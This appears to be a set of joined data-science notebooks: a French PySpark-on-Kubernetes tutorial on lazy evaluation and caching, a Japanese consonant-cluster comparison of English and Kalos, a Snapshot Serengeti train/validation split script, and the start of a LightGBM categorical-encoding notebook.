Spark Kubernetes clusterAprès une petite session découverte de l'environnement d'execution local en introduction puis avec l'api S3, nous allons découvrir l'environnement d'execution **kubernetes**.Le schéma traditionnel pour comprendre l'architecture est le suivant :  Nous allons comme auparavant créer un SparkContext sur un notebook python qui lance une JVM localement.Ensuite ce programme driver se connectera à un Cluster Manager de type Kubernetes pour pouvoir lancer des workers. Spark-shell versus Spark-submit (mode client et mode cluster)Il est important, maintenant qu'on commence à manipuler des clusters spark, de rentrer dans ces détails d'architecture pour bien comprendre ce que l'on fait. Dans un **notebook jupyter nous faisons du spark shell** , à savoir que le datascientist peut intérargir avec son cluster spark en direct. C'est très séduisant mais néanmoins il ne faut pas oublier que pendant qu'on developpe et réfléchit à nos prochaines manipulations, notre application spark tourne déjà et reserve les ressources auprès du cluster. Il est donc recommandé de développer en intéractif avec moins de ressources et de plus petits jeux de données. A l'inverse, il est possible d'executer des **batchs spark**. Le programme s'arretant dès qu'il a fini son travail, il n'y a pas de gachis de ressources du à l'interaction et l'attente des commandes du datascientist.Ces batchs sont executés via la commande **spark-submit** dont j'affiche l'aide ci-dessous
###Code
! /opt/spark/bin/spark-submit --help
###Output
Usage: spark-submit [options] <app jar | python file | R file> [app arguments]
Usage: spark-submit --kill [submission ID] --master [spark://...]
Usage: spark-submit --status [submission ID] --master [spark://...]
Usage: spark-submit run-example [options] example-class [example args]
Options:
--master MASTER_URL spark://host:port, mesos://host:port, yarn,
k8s://https://host:port, or local (Default: local[*]).
--deploy-mode DEPLOY_MODE Whether to launch the driver program locally ("client") or
on one of the worker machines inside the cluster ("cluster")
(Default: client).
--class CLASS_NAME Your application's main class (for Java / Scala apps).
--name NAME A name of your application.
--jars JARS Comma-separated list of jars to include on the driver
and executor classpaths.
--packages Comma-separated list of maven coordinates of jars to include
on the driver and executor classpaths. Will search the local
maven repo, then maven central and any additional remote
repositories given by --repositories. The format for the
coordinates should be groupId:artifactId:version.
--exclude-packages Comma-separated list of groupId:artifactId, to exclude while
resolving the dependencies provided in --packages to avoid
dependency conflicts.
--repositories Comma-separated list of additional remote repositories to
search for the maven coordinates given with --packages.
--py-files PY_FILES Comma-separated list of .zip, .egg, or .py files to place
on the PYTHONPATH for Python apps.
--files FILES Comma-separated list of files to be placed in the working
directory of each executor. File paths of these files
in executors can be accessed via SparkFiles.get(fileName).
--archives ARCHIVES Comma-separated list of archives to be extracted into the
working directory of each executor.
--conf, -c PROP=VALUE Arbitrary Spark configuration property.
--properties-file FILE Path to a file from which to load extra properties. If not
specified, this will look for conf/spark-defaults.conf.
--driver-memory MEM Memory for driver (e.g. 1000M, 2G) (Default: 1024M).
--driver-java-options Extra Java options to pass to the driver.
--driver-library-path Extra library path entries to pass to the driver.
--driver-class-path Extra class path entries to pass to the driver. Note that
jars added with --jars are automatically included in the
classpath.
--executor-memory MEM Memory per executor (e.g. 1000M, 2G) (Default: 1G).
--proxy-user NAME User to impersonate when submitting the application.
This argument does not work with --principal / --keytab.
--help, -h Show this help message and exit.
--verbose, -v Print additional debug output.
--version, Print the version of current Spark.
Cluster deploy mode only:
--driver-cores NUM Number of cores used by the driver, only in cluster mode
(Default: 1).
Spark standalone or Mesos with cluster deploy mode only:
--supervise If given, restarts the driver on failure.
Spark standalone, Mesos or K8s with cluster deploy mode only:
--kill SUBMISSION_ID If given, kills the driver specified.
--status SUBMISSION_ID If given, requests the status of the driver specified.
Spark standalone, Mesos and Kubernetes only:
--total-executor-cores NUM Total cores for all executors.
Spark standalone, YARN and Kubernetes only:
--executor-cores NUM Number of cores used by each executor. (Default: 1 in
YARN and K8S modes, or all available cores on the worker
in standalone mode).
Spark on YARN and Kubernetes only:
--num-executors NUM Number of executors to launch (Default: 2).
If dynamic allocation is enabled, the initial number of
executors will be at least NUM.
--principal PRINCIPAL Principal to be used to login to KDC.
--keytab KEYTAB The full path to the file that contains the keytab for the
principal specified above.
Spark on YARN only:
--queue QUEUE_NAME The YARN queue to submit to (Default: "default").
###Markdown
Ce batch peut alors être executé dans deux modes de fonctionnement :* le mode client dans lequel le driver spark est executé directement sur la jvm local.* le mode cluster dans lequel le driver spark est executé sur un des noeuds du cluster spark.Dans la suite de ce tutorial, je vais continuer à utiliser le shell interactif qui est parfaitement adapté au travail sur notebook.Mais vous pouvez executer les examples de la distribution sur kubernetes sur un terminal (File-> New -> Terminal) en faisant du spark submit (mode batch).```/opt/spark/bin/spark-submit \ --master k8s://https://kubernetes.default:443 \ --deploy-mode cluster \ --name spark-pi \ --class org.apache.spark.examples.SparkPi \ --conf spark.executor.instances=5 \ --conf spark.kubernetes.container.image=$IMAGE_NAME \ --conf spark.kubernetes.namespace=$KUBERNETES_NAMESPACE \ --conf spark.kubernetes.authenticate.driver.serviceAccountName=$KUBERNETES_SERVICE_ACCOUNT \ local:///opt/spark/examples/jars/spark-examples_2.12-3.0.1.jar /opt/spark/bin/spark-submit \ --master k8s://https://kubernetes.default:443 \ --deploy-mode cluster \ --name spark-pi \ --conf spark.executor.instances=5 \ --conf spark.kubernetes.container.image=$IMAGE_NAME \ --conf spark.kubernetes.namespace=$KUBERNETES_NAMESPACE \ --conf spark.kubernetes.authenticate.driver.serviceAccountName=$KUBERNETES_SERVICE_ACCOUNT \ local:///opt/spark/examples/src/main/python/pi.py 1000 ```
###Code
import os
import s3fs
endpoint = "https://"+os.environ['AWS_S3_ENDPOINT']
fs = s3fs.S3FileSystem(client_kwargs={'endpoint_url': endpoint})
from pyspark.sql import SparkSession
spark = (SparkSession
.builder
# url par défaut d'une api kubernetes accédé depuis l'intérieur du cluster
# (ici le notebook tourne lui même dans kubernetes)
.master("k8s://https://kubernetes.default.svc:443")
# image des executors spark: pour des raisons de simplicité on réutilise l'image du notebook
.config("spark.kubernetes.container.image", os.environ['IMAGE_NAME'])
# Nom du namespace kubernetes
.config("spark.kubernetes.namespace", os.environ['KUBERNETES_NAMESPACE'])
# Nombre d'executeur spark, il se lancera autant de pods kubernetes que le nombre indiqué.
.config("spark.executor.instances", "5")
# Mémoire alloué à la JVM
# Attention par défaut le pod kubernetes aura une limite supérieur qui dépend d'autres paramètres.
# On manipulera plus bas pour vérifier la limite de mémoire totale d'un executeur
.config("spark.executor.memory", "4g")
.config("spark.kubernetes.driver.pod.name", os.environ['KUBERNETES_POD_NAME'])
.getOrCreate()
)
sc = spark.sparkContext
# Nom du compte de service pour contacter l'api kubernetes : attention le package du datalab crée lui même cette variable d'enviromment.
# Dans un pod du cluster kubernetes il faut lire le fichier /var/run/secrets/kubernetes.io/serviceaccount/token
# Néanmoins ce paramètre est inutile car le contexte kubernetes local de ce notebook est préconfiguré
# conf.set("spark.kubernetes.authenticate.driver.serviceAccountName", os.environ['KUBERNETES_SERVICE_ACCOUNT'])
# Paramètres d'enregistrement des logs spark d'application
# Attention ce paramètres nécessitent la création d'un dossier spark-history. Spark ne le fait pas lui même pour des raisons obscurs
# import s3fs
# endpoint = "https://"+os.environ['AWS_S3_ENDPOINT']
# fs = s3fs.S3FileSystem(client_kwargs={'endpoint_url': endpoint})
# fs.touch('s3://tm8enk/spark-history/.keep')
# sparkconf.set("spark.eventLog.enabled","true")
# sparkconf.set("spark.eventLog.dir","s3a://tm8enk/spark-history")
###Output
WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by org.apache.spark.unsafe.Platform (file:/opt/spark/jars/spark-unsafe_2.12-3.2.0.jar) to constructor java.nio.DirectByteBuffer(long,int)
WARNING: Please consider reporting this to the maintainers of org.apache.spark.unsafe.Platform
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
2021-11-04 11:00:21,600 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
Setting default log level to "WARN".
To adjust logging level use sc.setLogLevel(newLevel). For SparkR, use setLogLevel(newLevel).
###Markdown
Le contexte spark se lance et si l'on utilise un terminal pour afficher l'ensemble des pods qui sont dans notre namespace, on voit que spark à lancer 5 executors qui sont des containers au sein du cluster kubernetes. Plutôt stylé !
###Code
!kubectl get pods
###Output
I1104 11:00:34.162086 605 request.go:665] Waited for 1.094928244s due to client-side throttling, not priority and fairness, request: GET:https://kubernetes.default/apis/cert-manager.io/v1alpha2?timeout=32s
NAME READY STATUS RESTARTS AGE
jupyter-727809-54795c5c7f-nt2jx 1/1 Running 0 87s
pyspark-shell-bab4157cea9b5cee-exec-1 1/1 Running 0 14s
pyspark-shell-bab4157cea9b5cee-exec-2 1/1 Running 0 14s
pyspark-shell-bab4157cea9b5cee-exec-3 1/1 Running 0 14s
pyspark-shell-bab4157cea9b5cee-exec-4 1/1 Running 0 14s
pyspark-shell-bab4157cea9b5cee-exec-5 1/1 Running 0 14s
vscode-25752-d6c97f84b-jsk4t 1/1 Running 0 45h
###Markdown
On peut d'ailleurs essayer d'embeter spark pour voir ce qu'il se passe, en supprimant violemment un executor.
###Code
!kubectl delete pods pyspark-shell-bab4157cea9b5cee-exec-1
!kubectl get pods
###Output
I1104 11:01:14.912464 752 request.go:665] Waited for 1.147621913s due to client-side throttling, not priority and fairness, request: GET:https://kubernetes.default/apis/kyverno.io/v1alpha1?timeout=32s
NAME READY STATUS RESTARTS AGE
jupyter-727809-54795c5c7f-nt2jx 1/1 Running 0 2m8s
pyspark-shell-bab4157cea9b5cee-exec-2 1/1 Running 0 55s
pyspark-shell-bab4157cea9b5cee-exec-3 1/1 Running 0 55s
pyspark-shell-bab4157cea9b5cee-exec-4 1/1 Running 0 55s
pyspark-shell-bab4157cea9b5cee-exec-5 1/1 Running 0 55s
pyspark-shell-bab4157cea9b5cee-exec-6 1/1 Running 0 17s
vscode-25752-d6c97f84b-jsk4t 1/1 Running 0 45h
###Markdown
**conclusion** Et bien tout simplement le driver spark a relancé un autre executor. Pendant un calcul spark aurait quand même pu finir sans emcombre son traitement. Essayez de concevoir vous même un systeme de traitement distribué résilient et vous comprendrez l'interet de faire confiance à des frameworks éprouvés pour réaliser ce type de choses. Reprenons nos tweets sur fichier local
###Code
!mc cp s3/projet-spark-lab/diffusion/formation/data/trump-tweets/trump_insult_tweets_2014_to_2021.csv .
text_file = sc.textFile("trump_insult_tweets_2014_to_2021.csv")
counts = text_file.flatMap(lambda line: line.split(" ")) \
.map(lambda word: (word, 1)) \
.reduceByKey(lambda a, b: a + b) \
.sortBy(lambda a : - a[1])
###Output
2021-11-04 11:01:55,792 WARN scheduler.TaskSetManager: Lost task 1.0 in stage 0.0 (TID 1) (10.233.118.242 executor 3): java.io.FileNotFoundException: File file:/home/jovyan/work/spark-formation/trump_insult_tweets_2014_to_2021.csv does not exist
at org.apache.hadoop.fs.RawLocalFileSystem.deprecatedGetFileStatus(RawLocalFileSystem.java:779)
at org.apache.hadoop.fs.RawLocalFileSystem.getFileLinkStatusInternal(RawLocalFileSystem.java:1100)
at org.apache.hadoop.fs.RawLocalFileSystem.getFileStatus(RawLocalFileSystem.java:769)
at org.apache.hadoop.fs.FilterFileSystem.getFileStatus(FilterFileSystem.java:462)
at org.apache.hadoop.fs.ChecksumFileSystem$ChecksumFSInputChecker.<init>(ChecksumFileSystem.java:160)
at org.apache.hadoop.fs.ChecksumFileSystem.open(ChecksumFileSystem.java:372)
at org.apache.hadoop.fs.ChecksumFileSystem.lambda$openFileWithOptions$0(ChecksumFileSystem.java:896)
at org.apache.hadoop.util.LambdaUtils.eval(LambdaUtils.java:52)
at org.apache.hadoop.fs.ChecksumFileSystem.openFileWithOptions(ChecksumFileSystem.java:894)
at org.apache.hadoop.fs.FileSystem$FSDataInputStreamBuilder.build(FileSystem.java:4768)
at org.apache.hadoop.mapred.LineRecordReader.<init>(LineRecordReader.java:115)
at org.apache.hadoop.mapred.TextInputFormat.getRecordReader(TextInputFormat.java:67)
at org.apache.spark.rdd.HadoopRDD$$anon$1.liftedTree1$1(HadoopRDD.scala:286)
at org.apache.spark.rdd.HadoopRDD$$anon$1.<init>(HadoopRDD.scala:285)
at org.apache.spark.rdd.HadoopRDD.compute(HadoopRDD.scala:243)
at org.apache.spark.rdd.HadoopRDD.compute(HadoopRDD.scala:96)
at org.apache.spark.rdd.RDD.computeOrReadCheckpoint(RDD.scala:373)
at org.apache.spark.rdd.RDD.iterator(RDD.scala:337)
at org.apache.spark.rdd.MapPartitionsRDD.compute(MapPartitionsRDD.scala:52)
at org.apache.spark.rdd.RDD.computeOrReadCheckpoint(RDD.scala:373)
at org.apache.spark.rdd.RDD.iterator(RDD.scala:337)
at org.apache.spark.api.python.PythonRDD.compute(PythonRDD.scala:65)
at org.apache.spark.rdd.RDD.computeOrReadCheckpoint(RDD.scala:373)
at org.apache.spark.rdd.RDD.iterator(RDD.scala:337)
at org.apache.spark.api.python.PairwiseRDD.compute(PythonRDD.scala:115)
at org.apache.spark.rdd.RDD.computeOrReadCheckpoint(RDD.scala:373)
at org.apache.spark.rdd.RDD.iterator(RDD.scala:337)
at org.apache.spark.shuffle.ShuffleWriteProcessor.write(ShuffleWriteProcessor.scala:59)
at org.apache.spark.scheduler.ShuffleMapTask.runTask(ShuffleMapTask.scala:99)
at org.apache.spark.scheduler.ShuffleMapTask.runTask(ShuffleMapTask.scala:52)
at org.apache.spark.scheduler.Task.run(Task.scala:131)
at org.apache.spark.executor.Executor$TaskRunner.$anonfun$run$3(Executor.scala:506)
at org.apache.spark.util.Utils$.tryWithSafeFinally(Utils.scala:1462)
at org.apache.spark.executor.Executor$TaskRunner.run(Executor.scala:509)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628)
at java.base/java.lang.Thread.run(Thread.java:829)
2021-11-04 11:01:55,949 ERROR scheduler.TaskSetManager: Task 0 in stage 0.0 failed 4 times; aborting job
[Stage 0:> (0 + 1) / 2]
###Markdown
**conclusion** Biensur c'est en erreur car le fichier n'est présent que localement sur le driver mais pas sur les executors.Il est nécessaire absolument de s'appuyer sur une source non locale dès lors que l'on distribue les calculs sur un cluster. Sur fichier distant ca marche beaucoup mieux :
###Code
text_file = sc.textFile("s3a://projet-spark-lab/diffusion/formation/data/trump-tweets/trump_insult_tweets_2014_to_2021.csv")
counts = text_file.flatMap(lambda line: line.split(" ")) \
.map(lambda word: (word, 1)) \
.reduceByKey(lambda a, b: a + b) \
.sortBy(lambda a : - a[1] )
counts.take(20)
###Output
###Markdown
Les données : sirene opendataLa suite de ce tutorial discute de la logique interne à spark indépendamment du ressource manager utilisé.Nous avons toujours ces données dans sur l'espace diffusion sauf que cette fois on va se servir des métadonnées de schéma.
###Code
import json
from pyspark.sql.types import StructType
with fs.open('s3://projet-spark-lab/diffusion/formation/schema/sirene/sirene.schema.json') as f:
a = f.read()
schema = StructType.fromJson(json.loads(a))
df = (spark.read
.format("csv")
.options(header='true', inferschema='false', delimiter=',')
.schema(schema)
.load("s3a://projet-spark-lab/diffusion/formation/data/sirene/sirene.csv")
)
df.printSchema()
###Output
root
|-- siren: integer (nullable = true)
|-- nic: integer (nullable = true)
|-- siret: long (nullable = true)
|-- dateFin: string (nullable = true)
|-- dateDebut: string (nullable = true)
|-- etatAdministratifEtablissement: string (nullable = true)
|-- changementEtatAdministratifEtablissement: boolean (nullable = true)
|-- enseigne1Etablissement: string (nullable = true)
|-- enseigne2Etablissement: string (nullable = true)
|-- enseigne3Etablissement: string (nullable = true)
|-- changementEnseigneEtablissement: boolean (nullable = true)
|-- denominationUsuelleEtablissement: string (nullable = true)
|-- changementDenominationUsuelleEtablissement: boolean (nullable = true)
|-- activitePrincipaleEtablissement: string (nullable = true)
|-- nomenclatureActivitePrincipaleEtablissement: string (nullable = true)
|-- changementActivitePrincipaleEtablissement: string (nullable = true)
|-- caractereEmployeurEtablissement: string (nullable = true)
|-- changementCaractereEmployeurEtablissement: string (nullable = true)
###Markdown
**WHAT ?????**La ligne "df = spark.read.." s'execute desormais instantannément.. alors que le fichier fait 6 Go.Pour le comprendre il faut connaitre ses deux objectifs :* définir le dataframe* définir/connaitre le schéma Spark SQL , le module de Spark qui travaille avec les données structurées, a besoin du schéma pour pouvoir optimiser le plan d'execution du job spark.Comme la dernière fois, on peut passer via une vue de la table pour faire des opérations SQL :
###Code
df.createOrReplaceTempView("sirene")
sqlDF = spark.sql("SELECT * FROM sirene")
sqlDF.printSchema()
###Output
root
|-- siren: integer (nullable = true)
|-- nic: integer (nullable = true)
|-- siret: long (nullable = true)
|-- dateFin: string (nullable = true)
|-- dateDebut: string (nullable = true)
|-- etatAdministratifEtablissement: string (nullable = true)
|-- changementEtatAdministratifEtablissement: boolean (nullable = true)
|-- enseigne1Etablissement: string (nullable = true)
|-- enseigne2Etablissement: string (nullable = true)
|-- enseigne3Etablissement: string (nullable = true)
|-- changementEnseigneEtablissement: boolean (nullable = true)
|-- denominationUsuelleEtablissement: string (nullable = true)
|-- changementDenominationUsuelleEtablissement: boolean (nullable = true)
|-- activitePrincipaleEtablissement: string (nullable = true)
|-- nomenclatureActivitePrincipaleEtablissement: string (nullable = true)
|-- changementActivitePrincipaleEtablissement: string (nullable = true)
|-- caractereEmployeurEtablissement: string (nullable = true)
|-- changementCaractereEmployeurEtablissement: string (nullable = true)
###Markdown
**RE WHATTTTTTTT ?????**Encore une execution instantannée... il y a un mystère et il faut désormais qu'on embarque réellement dans le monde de spark. LAZY EVALUATION , TRANSFORMATION et ACTIONTout d’abord, il faut savoir qu’en Spark, vous avez deux types d’opérations, les **transformations** et les **actions**. Les transformations en Spark sont ce qu’on appelle **lazy**, cela veut dire que, quand vous exécutez des fonctions de transformation en Spark, le framework ne va pas les exécuter de suite mais garde un enregistrement de la fonction appelée. L’ensemble de ces opérations vont construire un DAG (Directed Acyclic Graph : nous parlerons en détails du graphe dans un prochain tutorial consacré à l’anatomie d’un job spark). L’ensemble des opérations d’un traitement Spark est exécuté lorsqu’une fonction de type action est invoquée dans le programme (exemple : un count, un reduce, un write …).Il faut bien voir qu'en Spark, vous avez deux mondes :* la mémoire de spark* le reste du mondeTant qu'on définit un dataframe (sans inférer le schéma), qu'on le manipule en sélectionnant des colonnes ou des lignes, Spark ne va rien executer. Spark va attendre le dernier moment à savoir lorsqu'on veut sortir de la donnée (une action) :* sur du stockage distribué (S3 par ex)* sur le driver spark qui pilote le job (et oui le driver fait aussie parti du reste du monde)D'ailleurs vous pouvez regarder votre spark UI , aucune job n'a été lancé...En route pour la première action :
###Code
sqlDF.first()
###Output
###Markdown
**Lazy, donc pas d'effort inutile**Mon fichier fait 6 Go, j'ai défini une transformation pour sélectionner toutes les lignes, puis j'ai défini une action pour m'afficher uniquement la première ligne du dataframe... et bien clairement au vu de la rapidité de l'execution, Spark n'a pas téléchargé tout le fichier sur S3 mais simplement les premiers octets.**Lazy, donc attention quand même**Dans l'exemple suivant nous allons compter 3 fois de suite le nombre de lignes du dataframe sirene
###Code
%%timeit -r3
sqlDF.count()
###Output
[Stage 19:====================================================> (50 + 3) / 53]
###Markdown
 Vous pouvez confirmer que la lecture des 6 Go sur le stockage prend 26 seconde, et ceci à chaque fois qu'on compte le nombre de ligne du dataframe. Il n'y a aucune mise en cache par défaut. Ce sera votre rôle de produire un code efficace en persistant vos données dans Spark à la première utilisation.
###Code
sqlDF.cache()
###Output
_____no_output_____
###Markdown
l'instruction cache est lazy également... et la persistance (cache) sera faite à la prochaine action global sur le dataframe (comme un count)
###Code
%%timeit -r5
sqlDF.count()
###Output
###Markdown
 Et vous pouvez vérifier sur votre spark UI : le premier job a été très long, puisque spark avait du travail supplémentaire pour mettre en cache les données (en particulier il doit changer le format des données puisque vous voyez qu'on passe d'un csv de plus de 6go à 2,9go), mais ensuite tous les jobs suivants se sont executés à partir de la donnée en cache, sans jamais revenir à la consultation du fichier sur S3. L'onglet storage vous donne de l'information sur les rdd en cache, le nombre de partitions et si il a pu mettre les données en mémoire ou sur le disque des executeurs.  Un premier group-by pour conclure ce tutorial.On va grouper par code APE les données en cache sans utiliser la syntaxe SQL.
###Code
from pyspark.sql.functions import desc
%%timeit
sqlDF.groupBy("activitePrincipaleEtablissement").count().sort(desc("count")).head(10)
###Output
[Stage 61:======================================================> (52 + 1) / 53]
###Markdown
ConclusionCe tutorial était un peu plus dense en information :* execution sur un cluster plutot qu'en local mais avec le même code* appréhender un peu les concepts de transformation, action et de lazy evaluation* appréhender le cache de donnéeJe vous propose de relacher les ressources consommés par votre spark
###Code
spark.stop()
###Output
2021-11-04 11:44:26,300 WARN k8s.ExecutorPodsWatchSnapshotSource: Kubernetes client has been closed.
|
src/continuous-consonants.ipynb | ###Markdown
連続子音に関する英語とカロス語の比較
###Code
import csv
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
consonants = 'bcdfghjklmnpqrstvwxyz'
n = len(consonants)
def cluster_array(text):
arr = np.zeros((n, n))
text = text.lower()
for x, y in zip(text, text[1:]):
ix = consonants.find(x)
iy = consonants.find(y)
if ix > -1 and iy > -1:
arr[ix][iy] += 1
return arr
with open('tweets.csv') as csvfile:
reader = csv.reader(csvfile)
next(reader)
kalos = '\n'.join(row[1] for row in reader)
###Output
_____no_output_____
###Markdown
英語における連続子音の傾向 英語における連続子音の頻出度英語では連続子音のペア`th`が顕著に出現しています。
###Code
arr = cluster_array(open('Alice\'s Adventures in Wonderland by Lewis Carroll.txt').read())
fig, ax = plt.subplots()
im = ax.imshow(arr)
ax.set_xticks(np.arange(n))
ax.set_yticks(np.arange(n))
ax.set_xticklabels(list(consonants))
ax.set_yticklabels(list(consonants))
plt.show()
###Output
_____no_output_____
###Markdown
英語における連続子音の有無
###Code
# turn into yes/no matrix:
arr = arr > 0
fig, ax = plt.subplots()
im = ax.imshow(arr)
ax.set_xticks(np.arange(n))
ax.set_yticks(np.arange(n))
ax.set_xticklabels(list(consonants))
ax.set_yticklabels(list(consonants))
plt.show()
###Output
_____no_output_____
###Markdown
カロス語における連続子音の傾向 カロス語における連続子音の頻出度英語と違ってまんべんなく連続子音が存在します。
###Code
arr = cluster_array(kalos)
fig, ax = plt.subplots()
im = ax.imshow(arr)
ax.set_xticks(np.arange(n))
ax.set_yticks(np.arange(n))
ax.set_xticklabels(list(consonants))
ax.set_yticklabels(list(consonants))
plt.show()
###Output
_____no_output_____
###Markdown
カロス語における連続子音の有無カロス語は全ての子音の組み合わせが存在します。
###Code
# turn into yes/no matrix:
arr = arr > 0
fig, ax = plt.subplots()
im = ax.imshow(arr)
ax.set_xticks(np.arange(n))
ax.set_yticks(np.arange(n))
ax.set_xticklabels(list(consonants))
ax.set_yticklabels(list(consonants))
plt.show()
###Output
_____no_output_____ |
notebooks/snapshot_serengeti_split_genarate_csv_list.ipynb | ###Markdown
Loading Snaposhot Serengeti data
###Code
with open('../data/SnapshotSerengetiSplits_v0.json') as json_file:
recommend_train_val_splits = json.load(json_file)
serengeti_annotations = pd.read_csv('../data/SnapshotSerengeti_v2_1_annotations.csv')
serengeti_annotations = serengeti_annotations[['capture_id', 'season', 'site', 'question__species']].copy()
serengeti_images = pd.read_csv('../data/SnapshotSerengeti_v2_1_images.csv')
serengeti_images = serengeti_images.drop('Unnamed: 0', axis=1)
serengeti_images_labeled = pd.merge(serengeti_images, serengeti_annotations, on='capture_id', how='outer')
###Output
_____no_output_____
###Markdown
We will only use seasons 1-6:
###Code
serengeti_images_labeled = serengeti_images_labeled[
serengeti_images_labeled.season.isin(['S1', 'S2', 'S3', 'S4', 'S5', 'S6'])].copy()
###Output
_____no_output_____
###Markdown
Remove images with more than one species identified
###Code
non_single_spc_instances = serengeti_images_labeled[
serengeti_images_labeled[['image_path_rel']].duplicated(keep=False)]
non_single_spc_instances = non_single_spc_instances.image_path_rel.unique()
serengeti_images_labeled = serengeti_images_labeled[
~serengeti_images_labeled.image_path_rel.isin(non_single_spc_instances)].copy()
###Output
_____no_output_____
###Markdown
Split by site: Mark train/val images:
###Code
val_dev = ['D09',
'J06',
'C12',
'B12',
'F11',
'C08',
'E07',
'O09',
'Q07',
'C13',
'E04',
'I06',
'D10',
'I08',
'M11',
'F02',
'D06',
'G09',
'N03',
'E10',
'J09',
'H13',
'T13']
#val_dev = random.sample(recommend_train_val_splits['splits']['train'], 23)
serengeti_images_labeled_split = serengeti_images_labeled.copy()
def mark_split(row):
if row['site'] in val_dev:
return 'val_dev'
elif row['site'] in recommend_train_val_splits['splits']['train']:
return 'train'
else:
return 'val'
serengeti_images_labeled_split['split'] = serengeti_images_labeled_split.apply(mark_split, axis=1)
pd.crosstab(serengeti_images_labeled_split.question__species, serengeti_images_labeled_split.split)
###Output
_____no_output_____
###Markdown
Select instances:
###Code
serengeti_images_labeled_split
def binarize_categories(row):
if row['question__species'] == 'blank':
return 0
else:
return 1
instances = serengeti_images_labeled_split[['image_path_rel', 'question__species', 'split']].copy()
instances['category'] = instances.apply(binarize_categories, axis=1)
pd.crosstab(instances.category, instances.split)
###Output
_____no_output_____
###Markdown
Verify if images were sized correctly:
###Code
ss_path = '/data/fagner/coruja/datasets/serengeti/serengeti_600x1024/'
all_images_download = [value['image_path_rel']
for key, value
in
instances.iterrows()
if os.path.isfile(ss_path + value['image_path_rel'])]
len(all_images_download)
len(instances)
instances = instances[instances.image_path_rel.isin(all_images_download)].copy()
###Output
_____no_output_____
###Markdown
Saving csv files
###Code
def save_split(data, split, col_file_name, col_category, file_patern):
data_processed = data[data.split == split].copy()
data_processed['file_name'] = data_processed[col_file_name]
data_processed['category'] = data_processed[col_category]
file_name = file_patern % split
data_processed[['file_name', 'category']].to_csv(file_name, index=False)
save_split(instances, 'train', 'image_path_rel', 'category', '../data/ss_%s_empty.csv')
save_split(instances, 'val_dev', 'image_path_rel', 'category', '../data/ss_%s_empty.csv')
save_split(instances, 'val', 'image_path_rel', 'category', '../data/ss_%s_empty.csv')
save_split(instances, 'train', 'image_path_rel', 'question__species', '../data/ss_%s_species.csv')
save_split(instances, 'val_dev', 'image_path_rel', 'question__species', '../data/ss_%s_species.csv')
save_split(instances, 'val', 'image_path_rel', 'question__species', '../data/ss_%s_species.csv')
###Output
_____no_output_____
###Markdown
Balancing classes for empty/nonempty model:
###Code
train_empty_sample = instances[(instances.split == 'train') & (instances.category == 0)].sample(524804).copy()
instances_bal = pd.concat([train_empty_sample,
instances[(instances.split == 'train') & (instances.category == 1)]])
save_split(instances_bal, 'train', 'image_path_rel', 'category', '../data/ss_%s_empty_bal.csv')
###Output
_____no_output_____
###Markdown
Split by time:
###Code
serengeti_images_labeled_split_time = serengeti_images_labeled.copy()
def mark_time_split(row):
if row['season'] in ['S6'] :
return 'val'
elif row['season'] in ['S5']:
return 'val_dev'
else:
return 'train'
serengeti_images_labeled_split_time['split'] = serengeti_images_labeled_split_time.apply(mark_time_split, axis=1)
serengeti_images_labeled_split_time
pd.crosstab(serengeti_images_labeled_split_time.question__species, serengeti_images_labeled_split_time.split)
def binarize_categories(row):
if row['question__species'] == 'blank':
return 0
else:
return 1
instances = serengeti_images_labeled_split_time[['image_path_rel', 'question__species', 'split']].copy()
instances['category'] = instances.apply(binarize_categories, axis=1)
pd.crosstab(instances.category, instances.split)
ss_path = '/data/fagner/coruja/datasets/serengeti/serengeti_600x1024/'
all_images_download = [value['image_path_rel']
for key, value
in
instances.iterrows()
if os.path.isfile(ss_path + value['image_path_rel'])]
instances = instances[instances.image_path_rel.isin(all_images_download)].copy()
len(instances)
save_split(instances, 'train', 'image_path_rel', 'category', '../data/ss_time_%s_empty.csv')
save_split(instances, 'val_dev', 'image_path_rel', 'category', '../data/ss_time_%s_empty.csv')
save_split(instances, 'val', 'image_path_rel', 'category', '../data/ss_time_%s_empty.csv')
save_split(instances, 'train', 'image_path_rel', 'question__species', '../data/ss_time_%s_species.csv')
save_split(instances, 'val_dev', 'image_path_rel', 'question__species', '../data/ss_time_%s_species.csv')
save_split(instances, 'val', 'image_path_rel', 'question__species', '../data/ss_time_%s_species.csv')
train_empty_sample = instances[(instances.split == 'train') & (instances.category == 0)].sample(516635).copy()
instances_bal = pd.concat([train_empty_sample,
instances[(instances.split == 'train') & (instances.category == 1)]])
save_split(instances_bal, 'train', 'image_path_rel', 'category', '../data/ss_time_%s_empty_bal.csv')
###Output
_____no_output_____ |
analysis/6.4_LightGBM API (not scikit-learn).ipynb | ###Markdown
Using LightGBM as designed (not through sklearn API) Automatically Encode Categorical ColumnsI've been encoding the geo_level columns as numeric this whole time. Can it perform better by using categorical columns?LGBM can handle categorical features directly. No need to OHE them. But they must be ints. 1. Load in X2. Label Encode all the categorical features - All `object` dypes are categorical and need to be LabelEncoded
###Code
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
import pandas as pd
import pickle
import lightgbm as lgb
from pathlib import Path
### USE FOR LOCAL JUPYTER NOTEBOOKS ###
DOWNLOAD_DIR = Path('../download')
DATA_DIR = Path('../data')
SUBMISSIONS_DIR = Path('../submissions')
MODEL_DIR = Path('../models')
#######################################
X = pd.read_csv(DOWNLOAD_DIR / 'train_values.csv', index_col='building_id')
categorical_columns = X.select_dtypes(include='object').columns
bool_columns = [col for col in X.columns if col.startswith('has')]
X_test = pd.read_csv(DOWNLOAD_DIR / 'test_values.csv', index_col='building_id')
y = pd.read_csv(DOWNLOAD_DIR / 'train_labels.csv', index_col='building_id')
sns.set()
from sklearn.preprocessing import OrdinalEncoder, LabelEncoder
from sklearn.compose import ColumnTransformer
label_enc = LabelEncoder()
t = [('ord_encoder', OrdinalEncoder(dtype=int), categorical_columns)]
ct = ColumnTransformer(transformers=t, remainder='passthrough')
X_all_ints = ct.fit_transform(X)
y = label_enc.fit_transform(y.reshape(-1,))
# Note that append for pandas objects works differently to append with
# python objects e.g. python append modifes the list in-place
# pandas append returns a new object, leaving the original unmodified
not_categorical_columns = X.select_dtypes(exclude='object').columns
